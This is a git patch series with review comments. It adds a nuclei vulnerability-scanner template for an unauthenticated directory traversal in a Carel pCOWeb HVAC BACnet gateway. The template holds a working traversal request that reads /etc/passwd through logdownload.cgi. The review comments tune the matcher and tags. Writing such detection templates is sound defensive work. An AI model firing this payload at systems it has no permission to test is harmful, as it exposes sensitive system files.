From 549c969d5f4ff5e1dc8384bd126cfadb08d70538 Mon Sep 17 00:00:00 2001
From: GwanYeong Kim
Date: Sat, 16 Jul 2022 10:59:44 +0900
Subject: [PATCH 1/2] Create carel-bacnet-gateway-directory-traversal.yaml

The device suffers from an unauthenticated arbitrary file disclosure vulnerability. Input passed through the 'file' GET parameter through the 'logdownload.cgi' Bash script is not properly verified before being used to download log files. This can be exploited to disclose the contents of arbitrary and sensitive files via directory traversal attacks.

Signed-off-by: GwanYeong Kim
---
 ...el-bacnet-gateway-directory-traversal.yaml | 20 +++++++++++++++++++
 1 file changed, 20 insertions(+)
 create mode 100644 vulnerabilities/other/carel-bacnet-gateway-directory-traversal.yaml

diff --git a/vulnerabilities/other/carel-bacnet-gateway-directory-traversal.yaml b/vulnerabilities/other/carel-bacnet-gateway-directory-traversal.yaml
new file mode 100644
index 0000000000..4a08a4ec45
--- /dev/null
+++ b/vulnerabilities/other/carel-bacnet-gateway-directory-traversal.yaml
@@ -0,0 +1,20 @@
+id: carel-bacnet-gateway-directory-traversal
+
+info:
+ name: Carel pCOWeb HVAC BACnet Gateway 2.1.0 - Unauthenticated Directory Traversal
+ author: gy741
+ severity: medium
+ description: The device suffers from an unauthenticated arbitrary file disclosure vulnerability. Input passed through the 'file' GET parameter through the 'logdownload.cgi' Bash script is not properly verified before being used to download log files. This can be exploited to disclose the contents of arbitrary and sensitive files via directory traversal attacks.
+ reference:
+ - https://www.zeroscience.mk/codes/carelpco_dir.txt
+ tags: carel,lfi,traversal,unauth
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/usr-cgi/logdownload.cgi?file=../../../../../../../../etc/passwd"
+
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"

From 1318dbbae86728cfd41a5eb573dc3f038abe443b Mon Sep 17 00:00:00 2001
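Review bot: The `matchers:` stanza at the end of the hunk relies on a single body regex (`"root:.*:0:0:"`) with no status-code condition, so a non-200 response whose body happens to contain that string is still reported as a finding; pairing the regex with a `status` matcher under `matchers-condition: and` keeps the detection but cuts that false-positive path. The `description:` scalar also reads awkwardly ("passed through the 'file' GET parameter through the 'logdownload.cgi'"); a tighter wording would be `Input passed via the 'file' GET parameter to the 'logdownload.cgi' Bash script is not properly verified before being used to download log files.` Indentation in this hunk appears flattened by the paste, so the nesting below is inferred from the usual nuclei layout.
```yaml
# … unchanged: id, info and requests/path definition …
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
      - type: status
        status:
          - 200
```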
From: Prince Chaddha
Date: Mon, 18 Jul 2022 13:47:02 +0530
Subject: [PATCH 2/2] Update and rename carel-bacnet-gateway-directory-traversal.yaml to carel-bacnet-gateway-traversal.yaml

---
 ...ory-traversal.yaml => carel-bacnet-gateway-traversal.yaml} | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
 rename vulnerabilities/other/{carel-bacnet-gateway-directory-traversal.yaml => carel-bacnet-gateway-traversal.yaml} (90%)

diff --git a/vulnerabilities/other/carel-bacnet-gateway-directory-traversal.yaml b/vulnerabilities/other/carel-bacnet-gateway-traversal.yaml
similarity index 90%
rename from vulnerabilities/other/carel-bacnet-gateway-directory-traversal.yaml
rename to vulnerabilities/other/carel-bacnet-gateway-traversal.yaml
index 4a08a4ec45..1b4037f347 100644
--- a/vulnerabilities/other/carel-bacnet-gateway-directory-traversal.yaml
+++ b/vulnerabilities/other/carel-bacnet-gateway-traversal.yaml
@@ -1,4 +1,4 @@
-id: carel-bacnet-gateway-directory-traversal
+id: carel-bacnet-gateway-traversal
 
 info:
 name: Carel pCOWeb HVAC BACnet Gateway 2.1.0 - Unauthenticated Directory Traversal
@@ -7,7 +7,7 @@ info:
 description: The device suffers from an unauthenticated arbitrary file disclosure vulnerability. Input passed through the 'file' GET parameter through the 'logdownload.cgi' Bash script is not properly verified before being used to download log files. This can be exploited to disclose the contents of arbitrary and sensitive files via directory traversal attacks.
 reference:
 - https://www.zeroscience.mk/codes/carelpco_dir.txt
- tags: carel,lfi,traversal,unauth
+ tags: carel,lfi,traversal,unauth,bacnet,unauth
 
 requests:
 - method: GET
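Review bot: The rewritten `tags:` line in the second hunk lists `unauth` twice (`carel,lfi,traversal,unauth,bacnet,unauth`), so the tag set carries a duplicate that tag filters and listings will surface as noise; it should read `tags: carel,lfi,traversal,unauth,bacnet`. The `id` rename in the first hunk matches the new file name and needs nothing further.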